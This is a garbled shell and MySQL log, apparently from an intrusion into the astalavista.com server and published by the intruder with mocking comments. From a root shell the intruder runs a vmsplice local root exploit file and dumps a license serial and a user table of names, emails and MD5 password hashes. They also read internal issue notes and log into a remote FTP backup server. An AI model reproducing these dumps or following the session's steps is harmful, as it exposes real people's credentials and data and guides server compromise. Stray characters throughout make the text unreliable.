/ m6 g+ @; B- |- Dsh-3.2# cd ..! Q2 k1 Y( E7 b$ X, h; [
sh-3.2# cd com4 K+ I/ ~, ~/ S5 o/ k( v: H
sh-3.2# ls -la
. l3 P1 E# Q: _3 a; F6 i2 K8 z4 Vtotal 141208% f/ w/ j3 d' b) B! c) F" I
drwx–x–x 10 com com 4096 Apr 28 12:40 .
E! A, z/ r" o1 w3 q. b: \drwxr-xr-x 14 root root 4096 Mar 11 17:56 .. S8 U' Y) |# a9 [+ E: S& X
drwx—— 2 com com 4096 Jun 4 04:04 backups n) t: k5 ~5 G u
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
7 |4 w1 L! p) K. edrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
{% q2 B2 f" f! a! F0 r-rw——- 1 com com 21880 Jun 2 08:07 .bash_history. A1 d+ Y5 u4 G$ p: @3 P8 ]- R
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout% ~* A+ j+ E8 q5 U4 v1 k
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
3 d" f" H0 ^9 {* u7 z$ L$ h ?-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc/ M- P W) G0 S7 L i- e
drwx–x–x 3 com com 4096 Jan 29 2008 domains n1 R9 x4 z" j2 q4 v9 \
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed9 @2 g8 |) t/ A2 d3 @* g
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
, e9 p- R' o6 I3 b% Q-rw——- 1 com com 69 Nov 18 2008 .lesshst
: b3 V3 `% y6 |7 ^. rdrwx—— 2 com com 4096 Sep 24 2007 mail. ~7 n3 r# I8 {* S, d0 [1 W
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history) J, @# g" I( K0 e5 i8 u T
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
* b/ x! B' d9 @lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
! H4 d6 ~6 l" f2 }; x. Q-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
: s+ [( ~$ h$ n! ^drwx—— 2 com com 4096 Aug 26 2008 .ssh
2 V% D$ E# q) }0 f; I8 V/ X$ T-rwx—— 1 com com 8515 Feb 10 2008 t
. i& ]4 N, x1 P, \! U l. E6 T-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c( P/ C! j8 `4 z# H$ W
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
2 h- w% V8 r7 l% g0 ` v% G: M c: q-rw-rw-r– 1 com com 617 May 20 2008 .toprc! A; t6 s9 T& K$ a8 r
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql/ y) g, H" x. k8 g/ J' n, L
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
3 }5 R- Z& ^" o3 _, g-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc) v1 t! U/ a; C# }& |" e1 v) m8 P' m
/ q2 h# t2 V: Y5 X5 V: x6 psh-3.2# head t.c
1 \$ t$ Z+ C4 E+ [) \% c5 R! O0 G. B/*
) f' v- C9 m3 p) _; @1 b2 @* jessica_biel_naked_in_my_bed.c
2 G* a7 x; ?$ e8 b/ d( |1 s*
' C* h/ n; ^+ G. f2 n- T* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
$ h& T, W e% h& b2 t6 S+ A- L* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.) D% a1 O7 O! q+ E
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
8 `) J6 v+ \( U7 Q- h*3 ]5 r/ }! i& h- Y
* Linux vmsplice Local Root Exploit
. j2 l4 z: E/ o: W5 h q" N$ N8 p" j* By qaaz
+ z6 ]" _! Y8 o0 C2 A*
. d0 `/ y/ C/ D- K5 k7 k/ N/ Q& i% m& S* U6 V/ l6 {6 y
sh-3.2# cd /6 t+ n# d$ v% f" \+ t7 `' u/ J
sh-3.2# ls -la3 a) j2 J7 B" Z8 _* d" X. b
total 3601 }9 k! c+ _' f; j& g! t
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .+ r* _7 B* w$ S. h9 Q# A- i8 `; \
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
2 z8 Y4 j% u+ R+ P-rw——- 1 root root 10240 Jun 3 02:39 aquota.group0 i/ W. F8 f) n8 a( u- _$ f' { a
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
# f3 G4 L8 b" f' S6 p) v-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
( b4 `' c# T4 h-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
' d$ b G! t2 n7 o( R ?* ~5 B-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
2 |% C8 M% ?* N- o9 Ddrwxr-xr-x 3 root root 4096 Dec 29 2007 backup. @9 ~; B3 D8 W7 j; u5 k T
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
: U+ a i. j* {0 d! |2 q! Pdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
! p, t/ I* s% s6 c% V9 @4 \" z; E; Ydrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
9 c2 `8 Z; ?4 f. O1 `drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc" a y7 ]6 d4 H T( b( q6 T
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
6 [' v% }& k H+ w% i- T1 Y. D; l-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
. S5 B/ i9 |2 Jdrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib# |9 U! ~. D# M! `* y$ }/ F8 ]2 O! Y
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
; C5 k8 G9 w9 ~% J+ Odrwx—— 2 root root 16384 Sep 11 2007 lost+found
/ V# N! u7 i' F3 k, Y7 ]4 W) Ldrwxr-xr-x 2 root root 4096 Mar 11 17:56 media5 E" @1 L5 g- g! d" V) u- V
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
8 Z/ ~/ r& X/ F% ^2 t/ Y0 z! C' x4 Bdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
9 Z5 q' ^4 v% ]8 D& z% h! h; `1 [-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
6 O4 j$ K+ L9 _" }2 l# jdrwxr-xr-x 2 root root 0 Jun 3 02:43 net
( L( ^! }8 [ E6 Gdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt. X I0 J0 U+ I+ K
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc6 b9 I# a3 `' n; G2 x9 E0 u* g
drwxr-x— 15 root root 4096 Jun 4 08:40 root
8 j- f2 F3 f' Y8 ~7 u* o" m. Tdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
( R4 G7 t- \: W# Idrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux2 p( s' K _% P) Y& I- l+ m
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv0 A1 b: |$ \) y
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys( u8 |( J' }: d& p
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp; C" p( e9 K9 C& z7 l; I
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
1 o( P: d7 {/ e' {8 k! @drwxr-xr-x 26 root root 4096 Jun 4 03:16 var
5 j8 z e: q* X$ a
& X, g9 a- I4 S" E" Ash-3.2# cd opt
3 C# }: ~- }" w, C# G# s4 a2 ash-3.2# ls -la4 a; y' g4 s3 N. `, s
total 205 G* O" w2 g6 t# n6 T: H2 y
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .% p: e0 k/ a) d0 W
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..0 _- e5 V" s% l9 _, `0 V' j
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws' r* H! m0 }# j8 e
! ]/ N/ O0 _* B* V7 bsh-3.2# cd lsws/ q- Q6 O1 E6 M5 p% F3 h; C' X7 h* U
sh-3.2# ls -la8 Z0 A: ?. L) p, `+ S
total 108
6 w4 ^6 Z7 V% V* Ddrwxr-xr-x 15 root root 4096 Mar 20 2008 .
2 \: y, M; A; `6 @/ Ldrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..( ?* V- }) E/ w w* r
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
; E# P) P$ {- ?- b" pdrwxr-xr-x 13 root root 4096 May 29 15:10 admin( i1 [# }; V2 F' u8 V
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
4 b+ F0 ]3 d4 }+ f9 C8 H K Y0 m Mdrwxr-xr-x 2 root root 4096 May 29 15:10 bin4 X1 y+ r* |& c% y- _
drwx—— 4 apache apache 4096 Jun 3 02:43 conf9 M; A* f' F) x$ A' P
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
7 M7 y4 m# P& G- k- h: Ndrwxr-xr-x 2 root root 4096 Sep 15 2008 docs
! g @9 O$ {. c2 l( `) K7 rdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin. m' p9 _/ B( k- P
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
+ H4 z" K) z1 }& L8 C6 h-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
9 }. h0 r! P! M; _3 s9 D-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
# o5 r$ [2 M$ o) F# o8 o-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL, P* m5 g$ j5 y5 M
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP9 z6 Y2 [" l# Z8 R0 b- h2 `, H
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
" ~$ ~6 t; s7 t' O: fdrwxr-xr-x 2 root root 4096 Mar 20 2008 php9 |3 u( c4 k9 N1 h6 s) @# w3 w. \
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
9 u6 X% ~! n+ x( I1 Sdrwxr-xr-x 3 root root 4096 Mar 20 2008 share
) D& y6 j+ `7 n-rw-r–r– 1 root root 6 May 29 15:10 VERSION" E+ p2 Z' }5 _+ _ J
9 l. z) N# s3 Fsh-3.2# cd conf" ` {' i- z; X9 @! L' v
sh-3.2# ls -la
' J" |7 l9 _4 K* h* gtotal 482 ^, p/ B v& V3 y+ n L
drwx—— 4 apache apache 4096 Jun 3 02:43 .
+ u; }7 y" ^1 m" j" z0 @% ddrwxr-xr-x 15 root root 4096 Mar 20 2008 ../ U; Y( ^1 O. y$ x& `' S- ]
drwx—— 2 apache apache 4096 Mar 20 2008 cert
8 {; P/ X: h; |-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml3 B9 ` B2 V5 U" ^( }! _
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
$ w) h3 [# H% M, V3 g6 S1 X- I. p-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
* s# q# S" N3 @; O: X4 Y-rw——- 1 apache apache 256 May 29 15:10 license.key2 `( k: q9 ] m, y+ ^
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old+ V# s9 E3 o( g
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties2 X+ x5 g9 U/ m& n7 |3 k
-rw——- 1 apache apache 20 May 29 15:10 serial.no
+ T, Y2 A( q; I- s: f% A7 Edrwx—— 2 apache apache 4096 Mar 20 2008 templates5 ~# w a4 u& r2 v; S! c
2 F5 n: L& ~6 f& @3 I: G9 Ksh-3.2# cat serial.no
9 C3 Y# x* W- {9 E0 aIbDl-oVsO-CKqL-wVRa7 l, ?5 l+ @& ]' u! c. o
" z: \5 O. J4 R* n: l
sh-3.2# mysql. p5 v" _0 D1 J1 s j$ L) ?
Welcome to the MySQL monitor. Commands end with ; or \g.5 {+ e0 v/ I: L7 q+ L& m& G3 p
Your MySQL connection id is 2868449 ?& U* ^9 o* F( \+ e( L" S
Server version: 5.0.45-community-log MySQL Community Edition (GPL)7 D' U2 h* {; B
: a) F' C/ e5 s1 d; E; IType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
; r* K# _% A" d$ L, q
' E1 S9 G4 o. g5 x& S3 ymysql> show databases;, h! ~' P& n7 L8 S4 u4 I
+———————–+1 k( e/ ~8 d1 y7 ]
| Database |
& e; r# E! T1 X, A6 B1 i" h3 F+———————–+
- G, A' S" R+ J) S5 k) {| information_schema |
6 k* T# r, @7 b; O; A8 t5 F% X& b| astanet_ads |( f9 Q0 \* Q( }' A P
| astanet_mailing_lists |4 v+ W2 I0 X( w* v5 h6 n& ^* D
| astanet_mediawiki |
% C" } D1 K1 Q: {| astanet_membersystem |
8 J0 P- Y0 m9 z, P* q| com_contrexx |
. Z- [ x; [. h| com_contrexx2 |# F; }. \% i# J# C: |
| com_contrexx2_live |# I" f+ x }. }1 u* z+ J$ ]* ]2 w
| da_roundcube |7 F. X) C' e0 D
| dolphin |6 S2 e N0 x8 n/ o
| ideapool |7 L. `% @6 @0 }8 D8 G
| mysql |0 x8 s. l4 ?% n) s8 D8 O6 ^
| test |
1 D5 |& N. w/ j9 }| yourmaster |
& S6 E! L/ n8 z7 t$ m+———————–+. h1 j- C# z: F; S5 |
14 rows in set (0.00 sec)1 W. ^! K& Z" Q, C
7 K& A8 m T6 Z3 Wmysql> use ideapool
- I7 A# U+ J, A( w' GDatabase changed0 R! K$ G! s& N, x
mysql> show tables;
- i8 ]9 ?( j7 H+———————————–+
! R1 r1 z. B- m% Z| Tables_in_ideapool |
, ?, d; _, k) i+———————————–+
, S" }" l3 Z( s, K: ^+ ]| eventum_columns_to_display |
O: G8 t) D; E; B+ G| eventum_custom_field |/ V* `% B. T' B: v6 F3 v
| eventum_custom_field_option |
& }. Q8 K) [- t" C6 G# ^. X| eventum_custom_filter |( Z \7 ?# C! x2 K+ q! @# U
| eventum_customer_account_manager |
& n8 j: Y# M+ U3 N4 D| eventum_customer_note |
5 r% T5 ?' n/ p% U5 ^| eventum_email_account |, S* K: U& P4 k0 @' ^& t# R
| eventum_email_draft |0 H/ V$ h9 T5 I3 n5 @0 K
| eventum_email_draft_recipient |) x3 x* S1 C6 h' q5 _$ u, l
| eventum_email_response |
c: H O& I! Y- f4 t, c| eventum_faq |% O' F9 Z4 N6 k. k8 @+ A
| eventum_faq_support_level |
+ H% D/ m8 M- Z) q! m D1 P| eventum_group |
" D7 w& Z# ]) p: ^9 ~, s| eventum_history_type |
7 O( S; T) ^# V| eventum_irc_notice |8 d N1 y6 s, u
| eventum_issue |
, f/ W3 `. d" ^| eventum_issue_association |
. v+ l: Z, D; i, L3 e| eventum_issue_attachment |
/ X% a* S; Q4 d3 O& f$ u+ U| eventum_issue_attachment_file |
3 ~1 \; k; y9 b/ I) K( n: [| eventum_issue_checkin |( q A2 C; r& q
| eventum_issue_custom_field |
2 L5 M: J) d6 J j| eventum_issue_history |; f3 |6 H0 r0 H6 ?% e' K
| eventum_issue_quarantine |
; I1 R S) d0 @; z F0 R| eventum_issue_requirement |1 M& R5 A) C: O N2 J
| eventum_issue_user |
! b# O" W6 I8 o) T R| eventum_issue_user_replier |
: G+ O2 Q1 ^* ]% w" V3 U( X| eventum_link_filter |
5 i3 Q; q0 K+ b/ U| eventum_mail_queue |( A$ a7 w. u$ H, h6 S! z3 J# r
| eventum_mail_queue_log |
* z( g/ @: @+ v7 ^) o- B& n3 o; O: \| eventum_news |
4 z/ @7 e9 z! h5 l+ L6 j| eventum_note |3 {% F+ g; w/ ~ m1 o; R
| eventum_phone_support |
% a9 r* H- u8 E: h, P$ _2 E| eventum_project |) F @' A4 W x& _# `
| eventum_project_category |
8 U. w# I0 U2 T2 u. l| eventum_project_custom_field |* P5 C) Q7 s5 F5 f8 S, p U. r
| eventum_project_email_response |
3 R2 y4 ]/ K s| eventum_project_field_display |
9 U9 E3 t$ E" J- U| eventum_project_group |
- s, H1 X$ Y9 S9 j6 o0 l; T| eventum_project_link_filter |
1 d) v, o# A9 q) }| eventum_project_news |
- D3 @( U) k# u3 D C$ V| eventum_project_phone_category |/ C8 Z8 T/ W. v# `1 D
| eventum_project_priority |
$ Y% m4 a" k0 }( ], M| eventum_project_release |
7 q0 L) t7 ~6 o. `+ R| eventum_project_round_robin |/ j, Z- j# P- E* u8 s
| eventum_project_status |5 C! }4 i g Z/ U4 ^) h, K6 k' Y
| eventum_project_status_date |0 @9 ?/ k9 r8 \1 E
| eventum_project_user |
8 S# f5 E! Q3 W5 Q: ^| eventum_reminder_action |# _/ }% `) v0 W- y3 u1 F1 N
| eventum_reminder_action_list |, g- b! D2 b6 E# E, _" ~* c
| eventum_reminder_action_type |2 W/ P1 ~/ V- P
| eventum_reminder_field |
2 ^; h3 k9 ]3 E4 D0 S1 u| eventum_reminder_history |
4 n5 `+ D9 a: \9 x" n| eventum_reminder_level |
e/ |3 S( H9 q' c| eventum_reminder_level_condition |
) p- q* ?/ D# x1 Y# V| eventum_reminder_operator |1 D" Y6 e; J- ]% |; y+ t
| eventum_reminder_priority |2 S% G0 H2 |1 U) ?
| eventum_reminder_requirement |( l" X! u) C. F7 z* ^
| eventum_reminder_triggered_action |
5 q" u$ k" H/ h0 b/ ?+ H- |- ?| eventum_resolution |/ ?; [* b; h d1 S% [ p9 H- m# x
| eventum_round_robin_user |, e( F _! f+ R( h7 N' a; }* Y
| eventum_search_profile |$ W5 K# A* m2 w
| eventum_status |3 k8 G1 R5 M! a
| eventum_subscription |4 g4 T4 F* D/ q- m0 Y" C; C
| eventum_subscription_type |( ] z: ~7 y1 _; N& t9 V) b
| eventum_support_email |1 \2 z W1 B5 {) P, ^; ]
| eventum_support_email_body |
; v q0 k/ l ?1 o. h0 n| eventum_time_tracking |. ]" L4 H# H x) s% E' v
| eventum_time_tracking_category |& s. }) l6 o" U8 ]0 f: r: {
| eventum_user |
$ C6 ^' T! [ E8 D$ f; C5 L+———————————–+
0 N" m+ g% l' [' s" p69 rows in set (0.00 sec)8 _; D6 W' e) Z
$ Q+ e- N3 j7 @# W0 |# u( `mysql> describe eventum_user;3 r9 L6 @1 B$ x& O% ~
+————————-+——————+——+—–+———————+—————-+! a/ t. o; {7 d, g* L
| Field | Type | Null | Key | Default | Extra |( H, ]! |6 a: b
+————————-+——————+——+—–+———————+—————-+4 @/ R2 E" v# I" g* y
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
5 @# L1 F! p- U, ^( O| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
" L/ [! i3 p9 l7 D| usr_customer_id | int(11) unsigned | YES | | NULL | |
( x5 Z. {- s% y| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |, H; l- _% b0 H* ]: `) E: Z
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
4 y: p4 W% M1 S| usr_status | varchar(8) | NO | | active | |
6 K, j% Y; i/ b. L# D0 }) J| usr_password | varchar(32) | NO | | | |" J) N, W+ b x. S, J
| usr_full_name | varchar(255) | NO | | | |- ]# H) \1 m; U D3 ]$ f
| usr_email | varchar(255) | NO | UNI | | |
( K1 G! W: c5 G+ x6 j0 @| usr_preferences | longtext | YES | | NULL | |. ?5 w9 Q; D w% p7 U
| usr_sms_email | varchar(255) | YES | | NULL | |1 r, F% U5 H: c. Y+ B8 x
| usr_clocked_in | tinyint(1) | YES | | 0 | |
, n3 Q! W5 d/ O% a: B5 |+ `2 W' b2 K| usr_lang | varchar(5) | YES | | NULL | |
- K6 \' b% n+ T* l+————————-+——————+——+—–+———————+—————-+
( q. A6 P0 l7 |% I2 N9 m+ F- l13 rows in set (0.00 sec)
" c5 o }( P" b/ k. V" h
. `. h, D4 i9 K! W4 @6 U# lmysql> select usr_full_name,usr_email,usr_password from eventum_user;
- z$ B, D b5 _% h. I$ |+———————-+——————————-+———————————-+
0 X5 @! |3 I$ S- X' Q S$ x5 p| usr_full_name | usr_email | usr_password |
& A4 H5 H/ g$ X* u& z! N4 S e( m+———————-+——————————-+———————————-++ U+ Z9 M, i5 U- K l
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
9 H% Q5 a. p' O( t5 x* _" E| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
5 H# l7 E, b/ `| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
6 H: n, K5 c# z5 A| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |6 @. C% p7 V$ `# L, {
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |6 A* x0 c$ |$ F" l# T2 P
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |& ~8 @7 h; k& c. y
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |# O/ g4 X( C) P1 H8 X, t9 Q3 ~
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd | {5 H+ ~4 \3 X N/ `: R
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
7 p9 U* g3 q: l% i| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |% T/ C' B2 l* ~- {, i+ `) a5 S! b
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |6 g- \" I% }- O$ Y3 K+ s" S
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e | n& t5 `- U' {/ W
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 | G$ f" o1 a# K7 E G* g
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |# [& v! n) f3 f! [! F8 |7 t
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
$ H0 Q% N @% r2 Q8 w+———————-+——————————-+———————————-+$ |, g1 p! \ x+ p O6 Z4 H
15 rows in set (0.00 sec)
4 C# x$ K- E( v& \5 U8 z5 ^. _
' _7 e& i2 z# a, x8 Cmysql> select iss_description from eventum_issue where iss_id = 43;
- k1 D O. p: P, y+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
1 O: r/ ]( f' w- k* S| iss_description
. l3 _4 {0 ^2 t9 m6 w/ P1 p|
0 x( b) z) K7 T/ W( R' B$ ]+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+5 b" j+ g! L3 c/ k' W" ]# k w- G
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be% T. o5 o8 [9 J! w" ~: J0 b
connected for 90 mins… 120mins… so what i propose is something like:
' s% D* P: E' n' g% f. o+ O链接标记[url]http://www.surfthechannel.com/[/url]
@$ G5 f+ _5 w, `since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
! B" i K% D! Ylike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
6 B( q- f! @( a6 m. p4 Nbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off1 j5 j1 [8 f$ P' r' L& s9 u
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
: r+ y1 j( e' n
' \. n" j8 K7 n: v* M' lWe could also put advertisement during play on the flash video player itself… extra $$…1 [& W) D% O* r- l; s) E1 ?3 K
6 t* I' f# C; [1 |: o7 k7 n
By sykadul |/ O. N8 U( R4 h- h
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
- k+ P6 C& v0 z1 row in set (0.00 sec): K. x" M( f) e) z7 |0 m" C1 E1 G
! R# f/ I7 L# m% o8 j// Money and extra $$ is all they care about. remember that.
6 ]: p& U }' p5 R7 C$ k% |2 S' a
D2 |! J& e; v# imysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
! I# h1 h, z% B% I& `" i) }# ]+————————+——————————————————————————————————————————————————————————————————————————————-+, Z! |3 ^ G; @ f9 `( X
| iss_summary | iss_description . ^0 M2 Q; k4 P
|
" Q8 ^" v0 b, o/ d5 L* C4 q) Z- U+————————+——————————————————————————————————————————————————————————————————————————————-+
* s$ e- Z, U* Z$ X8 M {| Forum for REAL EXPERTS | Hello,
0 F( K& C. v, ~8 y7 H: x2 E X+ W7 |, X4 j: \
Ishtus and I,
s2 {, |# L( @5 X: X! a& v) q, L
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
, E$ K8 j8 B6 i0 s. ?2 SONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..! U2 o0 O) I9 p# _& v, N
# y/ s$ m1 Y" g2 H( D9 e" iOne example a friend of mine from coresecurity.com!
0 s) F5 g" t9 r6 E- k( W o9 o$ m g6 k* f ~
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
/ V5 d# Y6 O$ ?& Q/ n
e" n5 t. w% J( v: U|! @2 x+ \1 o( _8 m$ W5 k& }
+————————+——————————————————————————————————————————————————————————————————————————————+# t2 E2 B( |9 t- ?7 ^2 l
1 row in set (0.00 sec)
# @( X3 A' Y/ a: C7 D$ i( v" y/ O- e6 i1 J. V. z" M+ C# P; s- u
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
% K( p9 D' P# ^5 k
# a& @2 I4 l4 }7 p2 r1 o' Hmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;# R; d" d2 e' \6 u) x) `( M) b; {
+——————+———————————————————————————————+
7 u7 L3 y0 ^+ G6 U' U| iss_summary | iss_description |: N" O u1 l; f$ E! p" I1 K- d
+——————+———————————————————————————————+
+ R ]+ T( t% z7 l& h| Website guidance | Virtual Girl which guides you trought the website.% V& q& {' H; m1 `! p! }- G/ c
! s( _0 l. x( @: l5 i/ ^- U, F; V! L
We need a girl with who you can ( talk )!!!4 f7 i) [! e* K: A" G1 V* w" h
Also for the News!
! Z4 ?" c) o) y$ t5 Y! v$ [So my suggestion is a girl who read you the news loud if you like!, [3 C8 v4 V$ J$ o
you can choose between read yourselfe or she read it for you or both! e1 `/ k4 l" P
3 s3 T( v" O$ [* h- s( m
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!4 u3 b% g- L% F1 {
8 H1 o2 i. Z( u0 b# S& H) Y! b
Have a look on the example girls!!8 L6 T I! Q0 l% y4 }7 Q. h
, @' T' K. `9 l. R链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]5 R# X3 ? e, C( [* f q0 Z! M
4 ?) M( r- w" g+ O5 \4 v0 R
or that5 S# f0 s. Q; O0 h) S p) ]3 x
% k' d' O& V( ]8 i) b+ P( Y D9 r$ u链接标记[url]http://www.yellostrom.de/[/url]
C4 G) _0 P' S; T" B: f& A* ]6 J4 j9 i0 i; K2 g. [' [
|6 x( O2 y4 \7 H8 Z* V
+——————+———————————————————————————————+
8 d6 }" j, I$ R+ ?$ Y+ g1 row in set (0.00 sec)3 j# C+ p9 l) o& j! m; i. ]
; P6 M. d3 }) ^# R7 _// ha ha.
" I' P9 e8 m; `) s& O
) u+ Z; J# ]' F& e) P5 ^mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
# k! P H1 B: Y5 P+ g) W+————————–+———————————————————————————————————–+' W$ d$ q" a# O4 Z# l( o$ J
| iss_summary | iss_description |
: C$ T/ ^. J G! a+————————–+———————————————————————————————————–+6 C( e3 ^( @& D- C$ s/ @
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
& C/ n' o- B* \* A+————————–+———————————————————————————————————–+: l( s5 s2 C$ G6 {: ~
1 row in set (0.00 sec)+ R' a# X: O. Q' [
- r2 p: Q6 _5 W6 G
// LOL.
$ I* P/ B) s0 u8 j) T+ n- ~) p* H2 J7 b+ S% J) [. _8 ^- V
mysql> exit
! q# n# a. y' h5 f' h1 K2 U( dBye1 X5 | S6 A8 c/ A1 G
/ J$ d/ I: P* Fsh-3.2# ftp 212.254.194.163+ ]/ a F- D5 [/ N
Connected to 212.254.194.163.
6 T, T! |( W5 d0 F7 p220 BackupCOM_VW FTP server ready.# ]/ r* j) M; m, M" z8 n' x, U
504 AUTH: security mechanism ‘GSSAPI’ not supported.
5 L3 [* B3 Z6 s" o2 {# s504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.9 m9 `" q" B0 z) @
KERBEROS_V4 rejected as an authentication type' S- }8 U$ p7 v7 u' W) U# g/ L
Name (212.254.194.163:root): astalavista.com
- m) T0 t) `3 A' y331 Password required for astalavista.com.) p% P# E! S9 p: n5 F# a
Password:! _! I% S) e$ A/ Y' Q- c: B
230 User astalavista.com logged in.' m& q( A4 k: O' Q' w; A' l
Remote system type is UNIX.& @4 X& G# P6 t
Using binary mode to transfer files.* T) N/ B: N+ ^. x/ V8 S
ftp> ls -la
3 C1 X: c; y g227 Entering Passive Mode (212,254,194,163,2,188), P9 ?! |+ j+ V; F+ W& v- Y/ |) q
150 Opening BINARY mode data connection for ‘file list’.' Q2 _9 j3 j5 J! r! ~( ]
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com3 u0 i- i8 c% U. d
226 Transfer complete.
. B: ?1 x, `" l+ X* X Lftp> cd astalavista.com
M) G# r/ x$ J; j3 n5 D7 q250 CWD command successful.
